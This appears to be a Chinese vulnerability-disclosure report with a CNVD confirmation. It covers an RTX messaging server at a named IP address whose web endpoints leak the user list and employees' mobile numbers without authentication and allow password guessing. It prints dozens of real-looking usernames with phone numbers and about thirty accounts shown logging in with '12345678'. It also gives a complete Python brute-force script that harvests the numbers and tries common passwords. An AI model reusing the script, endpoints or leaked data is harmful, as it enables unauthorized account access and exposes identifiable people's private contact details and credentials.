2014-01-11: 细节已通知厂商并且等待厂商处理中 2014-01-16: 厂商已经确认,细节仅向厂商公开 2014-01-26: 细节向核心白帽子及相关领域专家公开 2014-02-05: 细节向普通白帽子公开 2014-02-15: 细节向实习白帽子公开 2014-02-25: 细节向公众公开
RTX server 存在暴露用户信息的漏洞：下列接口无需任何认证即可通过 web 直接访问，可枚举公司全部 RTX 用户名、逐个查询用户手机号，并可对 /check.php 提交用户名/口令做验证（从而进行弱口令爆破）。
http://123.127.50.2:8012/userlist.php                    # 泄漏公司所有 RTX 用户（JSON 列表，含 id、name，未认证即可访问）
http://123.127.50.2:8012/getmobile.cgi?receiver=<用户名>   # 泄漏指定用户的手机号
http://123.127.50.2:8012/check.php                        # POST user/pwd 验证口令，可用于弱口令爆破
2250 zhangs 136833229352251 caob 135010985192252 luowb 135221449772253 lux 135229720582254 guihs 186117118552256 chengy 134010180262257 liuwei 130021550942258 lvjg 186118347892259 yaojr 137187221302260 sunqian 132604830722262 zhangjy 150100829582263 zhangp 139107093812264 xusong 132401886382266 liangt 139013859042267 jiangsh 134663191322269 wangyn 139103976792270 xianjh 136711822302271 zhaox 159108327902272 shaozh 135202750772274 weisw 131204526272275 louln 136613104802276 sunqx 139103230732277 zhangyan 137184300852278 zhangsuy 136110118052281 jinll 130110990302282 wancx 135011079092283 liudw 139107691152284 liuzw 158111287832285 wanghui 13466711828...... 共940+条记录
弱口令可登录Brute force starting....Please input the number of threads for brute force(default 10) : And it will take a little time ...username passwordzhangm 12345678songdj 12345678haoxq 12345678yuy 12345678jianghb 12345678tongl 12345678yinzy 12345678sunyb 12345678wangmz 12345678wancx 12345678liudw 12345678yulei 12345678wanghui 12345678xuelei 12345678xuyc 12345678liuf 12345678chenye 12345678mahong 12345678liuzx 12345678liuyy 12345678changh 12345678zhuanggw 12345678zhangj02 12345678zhangd 12345678wangk 12345678sungr 12345678chengxf 12345678guyu 12345678hexw 12345678wangqi 12345678
rtx check 脚本（PoC，Python 2：依次枚举用户、查询手机号并写入 out.txt，再用一个固定的小字典对 /check.php 做弱口令验证）
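#!/usr/bin/env python
#-*-coding=utf-8-*-
# date : 2013.12.16
# rtx hack
#
# Proof-of-concept for the RTX server information-disclosure issue described
# on this page.  Against one host it (1) pulls the full user list from
# /userlist.php without any authentication, (2) resolves every user's mobile
# number through /getmobile.cgi?receiver=<name> and writes the result to
# out.txt, and (3) POSTs a handful of trivial passwords to /check.php.
# The wordlist is deliberately tiny: the point is to show that accounts
# accept trivially guessable passwords, not to crack them.
# Only run this against systems you are authorised to test.
#
# Python 2 only (print statements, urllib.urlopen, httplib).
import getopt
import httplib
import json
import re
import sys
import threading
import time
import urllib


# Dotted-quad IPv4 address, each octet 0-255, anchored at both ends so that
# input such as "1.2.3.4.5" or "1.2.3.4:80" is rejected instead of being
# pasted straight into a URL (the original only used \b word boundaries).
_IPV4_RE = re.compile(
    r"^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"
    r"\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"
    r"\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"
    r"\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$")

# Passwords tried for every account, plus the account name itself (see fwork).
_COMMON_PASSWORDS = ['111111', '123456', 'qweasd', '222222',
                     '12345678', '000000', 'qusiba', '666666']

# Success heuristic for /check.php inherited from the original script: the
# value of the *second* response header (index 1) equals '2573'.
# NOTE(review): presumably a Content-Length that differs between the
# logged-in and the failure page -- confirm against the target before
# trusting a hit.
_SUCCESS_HEADER_INDEX = 1
_SUCCESS_HEADER_VALUE = '2573'


def usage():
    """Print the command-line help text."""
    print '''Usage : ./f.py -u target_ip
-h Show this page!'''


class postThread(threading.Thread):
    """Unused leftover worker; nothing in this script instantiates it.

    Kept so that the module namespace is unchanged.  run() prints the whole
    ``data`` sequence once per element, which looks unintended -- treat it
    as dead code.
    """
    def __init__(self, data):
        threading.Thread.__init__(self)
        self.data = data

    def run(self):
        for _ in self.data:
            try:
                print self.data
            except Exception, e:
                print e


class rtx(object):
    """rtx attacker class.

    Constructing an instance runs the whole check immediately: user
    enumeration, phone lookup and the weak-password sweep.  ``data`` ends up
    as the list of user records decoded from /userlist.php; each record is
    expected to carry at least ``id`` and ``name`` keys, and checkPhone adds
    a ``phone`` key.  ``port`` is kept as a string, as in the original.
    """
    ip = ''
    data = ''
    port = '8012'
    fullData = ''

    def __init__(self, ip):
        """Validate *ip*, fetch the user list and run every check.

        Exits the process (sys.exit) when the host does not answer with a
        JSON list on /userlist.php, i.e. when it does not look vulnerable.
        A malformed address only prints the banner and returns.
        """
        if not self.checkIp(ip):
            self._bad_ip_banner()
            return
        self.ip = ip
        url = "http://" + ip + ":" + self.port + "/userlist.php"
        try:
            content = urllib.urlopen(url).read()
            self.data = json.loads(content)
        except (IOError, ValueError), e:
            print "\033[1;31m" + self.ip + "\33[0m is not vulnerable!"
            sys.exit()
        # Valid JSON that is not a list of users (e.g. an error object) used
        # to crash later in checkPhone; treat it as "not vulnerable" too.
        if not isinstance(self.data, list):
            print "\033[1;31m" + self.ip + "\33[0m is not vulnerable!"
            sys.exit()
        self.checkVulnerable()
        self.checkPhone()
        self.bruteforce()

    @staticmethod
    def _bad_ip_banner():
        """Print the 'are you kidding me?' cow shown for a malformed address."""
        print " ______________"
        print " \033[07m are you kidding me? \033[27m "
        print " \ "
        print " \ \033[1;31m,__,\033[1;m "
        print " \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m "
        print " \033[1;31m(__) )\ \033[1;m "
        print " \033[1;31m ||--|| \033[1;m\033[05m*\033[25m\033[1;m [ l137 | lietdai@gmail.com ]\r\n\r\n"

    @staticmethod
    def checkIp(ip):
        """Return True when *ip* is a well-formed dotted-quad IPv4 address."""
        return _IPV4_RE.match(ip) is not None

    def checkVulnerable(self):
        """Report how many user records /userlist.php handed out."""
        print "\033[1;31m Oh...I got something!!"
        print " Please wait a bit....."
        print " " + str(len(self.data)) + " records was found!!\n\033[0m"

    def checkPhone(self):
        """Look up every user's mobile number and dump id/name/phone to out.txt.

        Each record in ``self.data`` gets a ``phone`` key holding the raw
        body returned by /getmobile.cgi.  A failed lookup for one user is
        printed and skipped instead of aborting the whole run (the original
        only guarded the file write, not the HTTP request), and out.txt is
        always closed.
        """
        print "\033[1;31m Now check phone number in records.....\033[0m"
        url = "http://" + self.ip + ":" + self.port + "/getmobile.cgi?receiver="
        output = open('out.txt', 'w')
        try:
            for record in self.data:
                try:
                    record['phone'] = urllib.urlopen(url + record['name']).read()
                    output.write(str(record['id']) + '\t' + record['name']
                                 + '\t' + record['phone'] + '\n')
                    print record
                except Exception, e:
                    print e
        finally:
            output.close()
        print "\033[1;31m put the records int out.txt\033[0m"

    def bruteforce(self):
        """Ask for a worker count and run fwork over disjoint slices of the users.

        The count must be 1-15 (anything else exits) and is additionally
        clamped to the number of records, so every worker gets a non-empty
        slice; the original integer division handed all records to the last
        thread when there were fewer records than workers.  Returns once all
        workers have finished; does nothing when there are no records.
        """
        print "\033[1;31m Brute force starting...."
        num = raw_input(" Please input the number of threads for brute force(default 10) : ")
        print " And it will take a little time ...\033[0m"
        if num == '':
            num = 10
        else:
            try:
                num = int(num)
            except ValueError, e:
                print e
                sys.exit()
        if (num < 1) or (num > 15):
            print "threads must in 1-15"
            sys.exit()
        if not self.data:
            return
        num = min(num, len(self.data))
        block = len(self.data) / num
        threads = []
        for i in xrange(num):
            if i == num - 1:
                chunk = self.data[block * i:]
            else:
                chunk = self.data[i * block:(i + 1) * block]
            threads.append(threading.Thread(target=self.fwork,
                                            args=(self.port, self.ip, chunk)))
        for t in threads:
            t.start()
        for t in threads:
            t.join()

    @staticmethod
    def fwork(port, ip, b):
        """Try each common password, plus the user name itself, for every user in *b*.

        *b* is a slice of the user records; ``port`` is the string class
        attribute and is converted for httplib.  A hit is printed as
        ``name password``.  Errors are printed and the next candidate is
        tried; the connection is closed whenever one was opened.
        """
        headers = {"Content-type": "application/x-www-form-urlencoded",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"}
        for record in b:
            name = record['name']
            # The original also considered record['phone'] as a candidate but
            # left it commented out; it is not tried here either.
            for pwd in _COMMON_PASSWORDS + [name]:
                httpClient = None
                try:
                    postData = urllib.urlencode({'user': name, 'pwd': pwd})
                    httpClient = httplib.HTTPConnection(ip, int(port), timeout=30)
                    httpClient.request("POST", "/check.php", postData, headers)
                    response = httpClient.getresponse()
                    responseHeader = response.getheaders()
                    if (len(responseHeader) > _SUCCESS_HEADER_INDEX
                            and responseHeader[_SUCCESS_HEADER_INDEX][1] == _SUCCESS_HEADER_VALUE):
                        print name, pwd
                except Exception, e:
                    print e
                finally:
                    # the original called close() unconditionally and raised
                    # AttributeError when the connection was never created
                    if httpClient is not None:
                        httpClient.close()

    def getWeakPass(self):
        """Append the lines of password.txt to ``self.dicts``.

        Not called anywhere in this script, and fwork does not read
        ``self.dicts`` -- it only uses the fixed list above.  The original
        appended to ``self.dists``, an attribute that never existed, so
        calling it raised AttributeError.
        """
        with open("password.txt") as file_ob:
            list_file = file_ob.readlines()
        if not hasattr(self, 'dicts'):
            self.dicts = []
        for x in list_file:
            self.dicts.append(x.strip('\n'))


def main():
    """Parse ``-u target_ip`` / ``-h`` and run the check against the target."""
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit()
    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o == "-u":
            rtx(a)
        else:
            usage()
    if len(opts) == 0:
        usage()


if __name__ == "__main__":
    main()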
危害等级:高
漏洞Rank:16
确认时间:2014-01-16 09:14
CNVD确认并复现所述情况,已经由CNVD通过公开联系渠道通报给中国建筑设计研究院处置。
暂无